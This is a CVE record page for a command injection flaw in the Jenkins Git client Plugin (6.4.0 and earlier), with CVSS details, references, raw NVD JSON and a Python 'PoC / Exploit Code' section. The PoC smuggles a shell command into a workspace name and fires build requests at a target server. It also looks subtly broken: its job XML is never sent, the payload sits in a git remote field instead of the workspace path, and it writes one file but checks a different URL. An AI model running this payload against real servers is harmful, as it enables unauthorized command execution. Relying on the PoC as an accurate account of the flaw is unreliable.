CVE-2025-67640

Description

Jenkins Git client Plugin 6.4.0 and earlier does not not correctly escape the path to the workspace directory as part of an argument in a temporary shell script generated by the plugin, allowing attackers able to control the workspace directory name to inject arbitrary OS commands.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:jenkins:git_client:*:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins Git client Plugin <= 6.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-67640 PoC - Jenkins Git client Plugin Command Injection
# This PoC demonstrates command injection via workspace directory name

import requests
import urllib.parse

# Target Jenkins server
JENKINS_URL = "http://target-jenkins-server:8080"
JOB_NAME = "vulnerable-project"
API_TOKEN = "attacker-api-token"

# Malicious workspace directory name with command injection
malicious_workspace = "workspace'; whoami > /tmp/pwned #"

# Step 1: Create or configure Jenkins job with malicious workspace
job_config = f"""
<?xml version='1.1' encoding='UTF-8'?>
<project>
  <description>Test project with injected workspace</description>
  <builders>
    <hudson.plugins.git.GitBuilder>
      <remote>{malicious_workspace}</remote>
    </hudson.plugins.git.GitBuilder>
  </builders>
</project>
"""

# Step 2: Trigger build to execute injected command
build_url = f"{JENKINS_URL}/job/{JOB_NAME}/build"
response = requests.post(build_url, auth=('attacker', API_TOKEN))

# Step 3: Check if command was executed
check_url = f"{JENKINS_URL}/userContent/pwned"
response = requests.get(check_url)
if response.status_code == 200:
    print("[+] Command injection successful! Check /tmp/pwned")
else:
    print("[-] Injection may have failed or requires different trigger")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67640
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67640
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67640/
[4] VulDB https://vuldb.com/cve/CVE-2025-67640
[5] https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3614

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67640", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.517", "lastModified": "2025-12-17T17:31:23.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Git client Plugin 6.4.0 and earlier does not not correctly escape the path to the workspace directory as part of an argument in a temporary shell script generated by the plugin, allowing attackers able to control the workspace directory name to inject arbitrary OS commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:git_client:*:*:*:*:*:jenkins:*:*", "versionEndExcluding": "6.4.1", "matchCriteriaId": "197C8F80-7DE7-4D0E-B681-F7F8A094D122"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3614", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}